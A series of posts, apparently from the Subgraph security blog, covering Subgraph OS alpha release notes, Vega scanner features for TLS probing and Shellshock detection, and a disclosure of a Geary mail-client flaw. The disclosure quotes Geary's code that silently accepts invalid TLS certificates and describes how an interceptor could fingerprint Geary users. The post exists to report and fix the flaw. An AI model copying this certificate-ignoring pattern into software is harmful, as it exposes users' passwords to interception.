Subgraph OS December 2016 ISO Availability

A new Subgraph OS Alpha ISO is available for download.

(Onionshare and Ricochet now work out of the box, fully sandboxed)

Download it here!

New features: Alpha release 3

1. ROFLCoptor Tor Control Port Filter and State Tracker Daemon

ROFLCoptor filters Tor control port traffic. It is configured with application-specific security policies to limit what actions may be performed through the control port. ROFLCoptor also includes integration with OZ for dynamic port forwarding capabilities to support fully sandboxed applications that create ephemeral Tor hidden services, such as OnionShare, Ricochet, and Bitcoin core.

2. OnionShare

Subgraph OS now includes OnionShare. OnionShare is an application for sharing files securely and anonymously over the Tor network. OnionShare is fully sandboxed in OZ and has been integrated into the Nautilus file manager (right-click on file to share over OnionShare).

3. Ricochet

Ricochet is an anonymous peer-to-peer instant messager. It is different from other instant messagers because instead of using central chat servers, users connect directly to one another over Tor hidden services. Ricochet runs fully sandboxed in OZ.

4. Subgraph OS Handbook

We have included our documentation in the operating system. A shortened version can be read from the desktop (using yelp). The complete documentation (HTML, PDF) can be found in the following directory: /usr/share/sgos-handbook/

Improvements and bug fixes

Our last ISO was released in June. There have been many improvements and fixes since. We'd like to highlight a few major ones.

1. Our Grsecurity kernel has been upgraded to version 4.8.15

Among other improvements, this fixes the "Dirty COW" vulnerability (CVE-2016-5195). We addressed this vulnerability earlier for users who have installed Subgraph OS. It is now addressed in the live disc as well.

2. MAC address spoofing has been fixed

For as long as memory serves, Linux users have used if-pre-up scripts to accomplish MAC spoofing for network interfaces. A number of years ago changes in NetworkManager broke this functionality. This bug first reported in 2010 remained unfixed until a couple of years ago, however the implemented fix via nm-dispatcher did not actually allow for MAC Spoofing and was only helpful for bringing up iptable rules.

Thankfully a reliable method was implemented via udev to spoof on boot. Recently, NetworkManager started implementing some new MAC spoofing technics of its own. However these are not yet fully capable, and broke the udev technique in passing. Thankfully upstream quickly provided a fix this time around. This means that our udev based mechanism works again. This required a configuration change for NetworkManager to "preserve" spoofed MAC addresses.

3. Audio issues addressed in OZ

We have updated the PulseAudio configuration to correct audio-related issues in sandboxed applications.

4. Application firewall improvements

The application firewall now includes "system" rules. These are the default rules for Subgraph OS. With this upgrade, they are now treated differently than the user-defined rules. The firewall settings UI has been updated to reflect this change. We have also improved the usability of the firewall settings UI and Prompt.

5. OZ now includes support for dynamic forwarders

Dynamic forwarders lay the groundwork for running servers in the OZ sandbox. This has enabled us to support OnionShare, Ricochat, and Bitcoin core, which all both start Tor hidden server servers in the sandbox. Incoming client connections are forwarded into the sandbox.

6. This release addresses the APT signature verification vulnerability


CVE-2016-1252 is now addressed in the live disc. Subgraph OS is only distributed for the x64 architecture, so it was not believed to be at risk. This release closes the vulnerability completely.

7. Port to gosecco

In this release we have integrated a new Go seccomp-bpf library developed by the ThoughtWorks Tiger team. Gosecco allows us to create more expressive and efficient policies for our sandboxed applications.


We would like to thank everybody for all of your help and feedback during the Alpha. We expect to have a Beta out sometime in 2017. There are some people we'd like to call out specifically:

Follow us on Twitter at @subgraph as well as at this blog for progress updates.

Subgraph OS Announcement

We are happy to announce that Subgraph is to receive support for 12 months of Subgraph OS development from the Open Technology Fund.

This means that we will be able to focus our efforts over the next year on development exclusively.

Our current areas of focus are:

  1. Oz, our framework for application isolation

  2. Tooling and automation for builds and tests of Subgraph OS packages as well as for the base OS image. We are working towards a downloadable ISO as soon as possible.

All of our code is to be hosted on Github, though for now everything there is very alpha. We invite the community to check it out.

Follow us on Twitter at @subgraph as well as at this blog for progress updates.

We will be posting soon about Oz.

Vega SSL/TLS Configuration Probes: Detecting POODLE and Other Issues

We recently added a feature in Vega: probing HTTPS server configuration settings for issues that have implications for user and application security.

Vega now attempts to detect and will alert on the following issues:

  • SSLv2, SSLv3 (POODLE) support
  • Certificate analysis: SHA-1, MD5, key size
  • Server/client ciphersuite preference
  • Forward secrecy support and prioritization
  • RC4
  • Cipher suite enumeration
  • Identifcation of weak / export grade cipher suites, anonymous Diffie-Hellman
  • TLS compression (susceptibility to CRIME attacks)

The probes occur before the crawler is started and will run for every HTTPS server target. Full details on the HTTPS audit will be output to the console after the probes have finished running.

This is still a work in progress, so consider it a beta release. The Vega HTTPS server configuration probing will be more comprehensive, reliable, and configurable in the future.

Download a new build from our website to try it out.

Vega HTTPS Config Probes

Vega HTTPS Config Probes Details

Subgraph Vega module for Bash Environment Variable OS Command Injection Vulnerability (CVE-2014-6271)

Today, a critical and trivially remotely exploitable vulnerability was announced in bash. To help users of our Vega web application scanner to identify this vulnerability, we have a released a basic standalone module to detect this vulnerability in web applications.

The module works by injecting test cases into certain HTTP header values as well as any web application form/query parameters. This should be adequate to detect this vulnerability in CGI setups where HTTP header values are turned into bash environment variables while also detecting cases where user-supplied input is passed through functions that spawn subshells such as system(), exec(), popen() in various languages. We will refine the module as more information becomes available and we are able to test it more.

This module is a good example of the power of Vega to quickly create proofs-of-concept in Javascript using the module API.

The module can be obtained here. It can be installed simply by adding it to the ‘vega/scripts/scanner/modules/injection/’ directory.

If you are not a Vega user, you can download it here or build it from source. We will soon bundle this module into our release tarball.

Due to the seriousness of this vulnerability, we also strongly advise everybody to install patches immediately.

Security vulnerability in Geary: Invalid server certificates accepted silently

Geary is a nice looking mail client for Linux / Gnome users.

We identified a vulnerability in Geary during some recent testing related to Subgraph OS, Mail and Nyms. Thankfully the maintainer responded to our report really quickly and there has already been a patch committed and backported. There are updated tarballs on the Geary homepage and hopefully distro upgrades will be available soon.

Here are the details on CVE-2014-5444:

When Geary connects to any server endpoint over SSL/TLS (IMAPS, SMTPS, IMAP + STARTTLS, SMTP + STARTTLS), it doesn’t act on certificate validation errors, which are detected but ignored. Further, the user is not even made aware when certificate validation fails except when Geary is run with optional debug output via the -d command-line switch.

In all validation failure cases the user credentials are transmitted to the server. This creates an effective attack to harvest user email passwords through active interception.

Geary is fairly identifiable on the wire, meaning that an adversary in a position to perform the attack can do so selectively, reducing the likelihood of detection if another, non-vulnerable mail client is intercepted.

One way to fingerprint Geary is to observe the IMAP IDLE refresh frequency, which occurs every 30 seconds. This is unusually short compared to the maximum IDLE limit of 30 minutes and the default behavior of other clients (Evolution: 10 minutes, Thunderbird: 10 minutes, Claws Mail: 5 minutes).

If exploited, an interception attack would not be perceptible to most users.

Here’s the problematic code, take note of the TODO in engine/api/geary-endpoint.vala:

private bool report_tls_warnings(string cx_type, TlsCertificateFlags warnings) {

// TODO: Report or verify flags with user, but for now merely
log for informational/debugging
// reasons and accede
message("%s TLS warnings connecting to %s: %Xh (%s)", cx_type,
to_string(), warnings, tls_flags_to_string(warnings));

return true;

It turns out that this is not an issue unknown to the developers, there is an open ticket that goes as far back as 2012. Our report prompted them to prioritize a fix. Big thank you to Geary developer Jim Nelson for acknowledging that this is a serious vulnerability for Geary users, some of whom are exposed to a high risk of active network interference.